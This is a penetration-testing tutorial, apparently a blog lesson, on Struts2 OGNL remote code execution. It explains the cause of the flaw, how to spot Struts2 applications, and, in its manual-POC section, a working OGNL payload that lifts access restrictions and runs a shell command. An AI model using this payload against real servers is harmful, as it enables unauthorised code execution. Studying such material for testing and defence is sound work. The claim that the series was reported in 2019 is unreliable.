In-depth Network Security Study, Lesson 3: Popular Framework Vulnerabilities (Struts2 Remote Code Execution, RCE)


1. Introduction to Struts2 framework

------ Struts2 is a web framework under the Apache project, commonly used in Internet, government and corporate portals such as Alibaba and JD.com.

------ The Struts framework itself is divided into three parts: the core controller FilterDispatcher, the business controller Action, and the enterprise business-logic components implemented by the user.


2. Struts2 remote code execution vulnerability

------ The Struts2 vulnerabilities are a classic vulnerability series that was reported in 2019. The root cause is that Struts2 introduced OGNL expressions to make the framework flexible and dynamic. Now that patching across the framework has improved, discovering new Struts2 vulnerabilities is much harder than before. In practice, most users have already fixed the historical high-risk vulnerabilities. Currently, in penetration testing, finding a Struts2 vulnerability is mostly a matter of luck; it is more productive against unpatched systems once the intranet has been reached.


3. The principle of Struts2 execution code

------ The dynamic nature of Struts2 comes from OGNL expressions: they can read the values of running variables and have the opportunity to execute function calls. If malicious request parameters can be fed into the OGNL evaluation process, the result is an arbitrary code execution vulnerability.

------ The essence of Struts2 RCE is the same in every case (except for S2-052): the Struts2 framework evaluates an OGNL expression supplied by a malicious user, causing remote code execution. It can lead to "command execution, server file operations, printed echo, reading system properties, dangerous code execution", and so on, but each of these requires careful construction of a different OGNL payload.


4. Struts2 framework characteristics (fingerprinting)

  1. Check the source code of the application system under test: the URL interface addresses end with ".action" or ".do", or the address contains a "!" symbol;

  2. On the server of the application under test, check the jar files in the /WEB-INF/lib/ directory of the application. If there is a jar file of the form struts2-core-2.*.**.jar or xwork-core-2.*.**.jar, you need to test whether a Struts2 remote code execution vulnerability is present.


5. Manual vulnerability POC

POC:

(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

Note: in some cases, remember to URL-encode the payload when using it.

For POCs for other Struts2 versions, please refer to:
https://vulhub.org/#/environments/struts2/


6. Reproducing the vulnerability with tools




Source: blog.csdn.net/p36273/article/details/132920600